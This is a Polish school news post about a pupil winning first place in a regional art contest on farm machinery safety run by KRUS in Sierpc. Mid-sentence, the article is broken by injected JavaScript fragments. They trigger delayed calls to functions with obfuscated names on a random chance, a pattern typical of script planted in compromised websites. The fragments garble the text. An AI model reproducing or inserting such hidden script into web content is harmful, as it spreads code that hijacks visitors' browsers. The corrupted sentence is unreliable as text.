I miejsce Dominiki Olszewskiej w IV Edycji Ogólnopolskiego Konkursu Plastycznego pod nazwą „Bezpiecznie na wsi – nie zbliżaj się zuchu do maszyny w ruchu”

Na przełomie marca i kwietnia 2014 roku w naszej szkole został przeprowadzony konkurs „Bezpiecznie na wsi – nie zbliżaj się zuchu do maszyny w ruchu” ogłoszony przez Placówkę Terenową KRUS w Sierpcu. Celem jego było promowanie pozytywnych zachowań związanych z pracą i zabawą na terenach wiejskich, poszerzanie wiedzy na temat bezpieczeństwa i higieny pracy w gospodarstwie rolnym.

Uczestnikami konkursu byli uczniowie klas 0-VI (w dwóch kategoriach wiekowych: 0-III i IV-VI). Zadaniem ich było wykonanie pracy plastycznej o tematyce związanej z zapobieganiem wypadkom z udziałem maszyn i urządzeń wykorzystywanych w gospodarstwie.

O wynikach konkursu zostaliśmy powiadomieni tuż przed końcem roku szkolnego 2013/2014 i okazało się, że spośród wszystkich nadom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}desłanych prac z terenu KRUS w Sierpcu, nasza uczennica Dominika Olszewska zajęła I miejsce w młodszej kategorii wiekowej i tym samym przeszła do kolejnego etapu wojewódzkiego. Wręczenie pamiątkowych dyplomów i nagród rzeczowych nastąpiło 24 sierpnia 2014 roku podczas Dożynek w Mochowie.

GRATULUJEMY!!!